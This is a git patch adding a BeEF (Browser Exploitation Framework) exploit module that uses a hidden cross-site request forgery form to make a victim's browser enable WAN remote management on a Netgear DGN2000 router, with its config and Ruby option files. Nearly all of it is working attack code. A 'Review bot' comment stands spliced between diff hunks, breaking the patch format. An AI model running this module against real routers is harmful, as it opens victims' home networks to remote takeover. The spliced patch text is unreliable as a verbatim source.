From ab0c0278c6f5d21bf52cd190b0bb862340a668f9 Mon Sep 17 00:00:00 2001
From: Nicholas Starke
Date: Sat, 25 Feb 2017 09:52:22 -0600
Subject: [PATCH] Adding Netgear DGN2000 WAN Remote Management CSRF Module
---
 .../command.js | 103 ++++++++++++++++++
 .../config.yaml | 15 +++
 .../netgear_dgn2000_wan_remote_mgmt/module.rb | 20 ++++
 3 files changed, 138 insertions(+)
 create mode 100644 modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/command.js
 create mode 100644 modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/config.yaml
 create mode 100644 modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/module.rb
diff --git a/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/command.js b/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/command.js
new file mode 100644
index 000000000..ba84a76ba
--- /dev/null
+++ b/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/command.js
@@ -0,0 +1,103 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var base = '<%= @base %>';
+ var sourceip = '<%= @sourceip %>';
+ var port = '<%= @port %>';
+ var acl = sourceip != '0.0.0.0' ? 'ip_address_list1' : 'all';
+ var parts = [];
+ if (sourceip != '0.0.0.0'){
+ parts = sourceip.split('.');
+ }
+
+ var netgear_iframe = beef.dom.createIframeXsrfForm(base, 'POST', 'application/x-www-form-urlencoded', [
+ { type: 'hidden', name: 'remote_mg', value: 'remote_mg' },
+ { type: 'hidden', name: 'rm_ip1', value: '' },
+ { type: 'hidden', name: 'rm_ip2', value: '' },
+ { type: 'hidden', name: 'rm_ip3', value: '' },
+ { type: 'hidden', name: 'rm_ip4', value: '' },
+ { type: 'hidden', name: 'rm_start_ip1', value: '' },
+ { type: 'hidden', name: 'rm_start_ip2', value: '' },
+ { type: 'hidden', name: 'rm_start_ip3', value: '' },
+ { type: 'hidden', name: 'rm_start_ip4', value: '' },
+ { type: 'hidden', name: 'rm_finish_ip1', value: '' },
+ { type: 'hidden', name: 'rm_finish_ip2', value: '' },
+ { type: 'hidden', name: 'rm_finish_ip3', value: '' },
+ { type: 'hidden', name: 'rm_finish_ip4', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip1_ip1', value: parts.length === 4 ? parts[0] : '' },
+ { type: 'hidden', name: 'rm_list1_ip1_ip2', value: parts.length === 4 ? parts[1] : '' },
+ { type: 'hidden', name: 'rm_list1_ip1_ip3', value: parts.lentgh === 4 ? parts[2] : '' },
+ { type: 'hidden', name: 'rm_list1_ip1_ip4', value: parts.length === 4 ? parts[3] : '' },
+ { type: 'hidden', name: 'rm_list1_ip2_ip1', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip2_ip2', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip2_ip3', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip2_ip4', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip3_ip1', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip3_ip2', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip3_ip3', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip3_ip4', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip4_ip1', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip4_ip2', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip4_ip3', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip4_ip4', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip5_ip1', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip5_ip2', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip5_ip3', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip5_ip4', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip6_ip1', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip6_ip2', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip6_ip3', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip6_ip4', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip7_ip1', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip7_ip2', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip7_ip3', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip7_ip4', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip8_ip1', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip8_ip2', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip8_ip3', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip8_ip4', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip9_ip1', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip9_ip2', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip9_ip3', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip9_ip4', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip10_ip1', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip10_ip2', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip10_ip3', value: '' },
+ { type: 'hidden', name: 'rm_list1_ip10_ip4', value: '' },
+ { type: 'hidden', name: 'rm_access', value: acl },
+ { type: 'hidden', name: 'remote_port', value: port },
+ { type: 'hidden', name: 'apply', value: 'Apply' },
+ { type: 'hidden', name: 'todo', value: 'save' },
+ { type: 'hidden', name: 'this_file', value: 'remotemg.htm' },
+ { type: 'hidden', name: 'next_file', value: 'remotemg.htm' },
+ { type: 'hidden', name: 'c4_rm_ip', value: '' },
+ { type: 'hidden', name: 'c4_rm_start_ip', value: '' },
+ { type: 'hidden', name: 'c4_rm_finish_ip', value: '' },
+ { type: 'hidden', name: 'c4_rm_list1_ip1_ip', value: sourceip },
+ { type: 'hidden', name: 'c4_rm_list1_ip2_ip', value: '' },
+ { type: 'hidden', name: 'c4_rm_list1_ip3_ip', value: '' },
+ { type: 'hidden', name: 'c4_rm_list1_ip4_ip', value: '' },
+ { type: 'hidden', name: 'c4_rm_list1_ip5_ip', value: '' },
+ { type: 'hidden', name: 'c4_rm_list1_ip6_ip', value: '' },
+ { type: 'hidden', name: 'c4_rm_list1_ip7_ip', value: '' },
+ { type: 'hidden', name: 'c4_rm_list1_ip8_ip', value: '' },
+ { type: 'hidden', name: 'c4_rm_list1_ip9_ip', value: '' },
+ { type: 'hidden', name: 'c4_rm_list1_ip10_ip', value: '' },
+ { type: 'hidden', name: 'h_remote_mg', value: 'enable' },
+ { type: 'hidden', name: 'h_rm_access', value: acl }
+ ]);
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');
+
+ cleanup = function() {
+ document.body.removeChild(netgear_iframe);
+ }
+
+ setTimeout('cleanup()', 15000);
+
+});
+
diff --git a/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/config.yaml b/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/config.yaml
new file mode 100644
index 000000000..02e36e7f7
--- /dev/null
+++ b/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/config.yaml
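Review bot: `setTimeout('cleanup()', 15000);` near the end of the hunk passes a string, which the browser evaluates like eval and which only resolves because `cleanup = function() {...}` is assigned without `var`, leaking an implicit global that a second run of this module or any other script on the page can overwrite before the timer fires. Declare the function locally and pass the reference: `var cleanup = function() { document.body.removeChild(netgear_iframe); };` followed by `setTimeout(cleanup, 15000);`. That keeps `netgear_iframe` bound by the closure instead of depending on a global lookup at fire time, and removes the string-evaluation path entirely.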
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ Netgear_dgn_2000_wan_mgmt_csrf:
+ enable: true
+ category: [ "Exploits", "Router" ]
+ name: "Netgear DGN 2000 WAN Remote Management"
+ description: "Attempts to enable remote management of the router on the WAN"
+ authors: ["Nick Starke"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/module.rb b/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/module.rb
new file mode 100644
index 000000000..552595e12
--- /dev/null
+++ b/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Netgear_dgn_2000_wan_mgmt_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'base', 'ui_label' => 'Router URL', 'value' => 'http://192.168.0.1'},
+ { 'name' => 'port', 'ui_label' => 'Port', 'value' => 8080},
+ { 'name' => 'sourceip', 'ui_label' => 'Source IP', 'value' => '0.0.0.0'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end